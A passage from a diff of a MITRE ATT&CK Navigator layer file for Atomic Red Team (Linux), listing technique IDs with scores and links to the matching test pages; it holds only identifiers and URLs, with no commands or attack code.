mment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}
\ No newline at end of file
+{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqu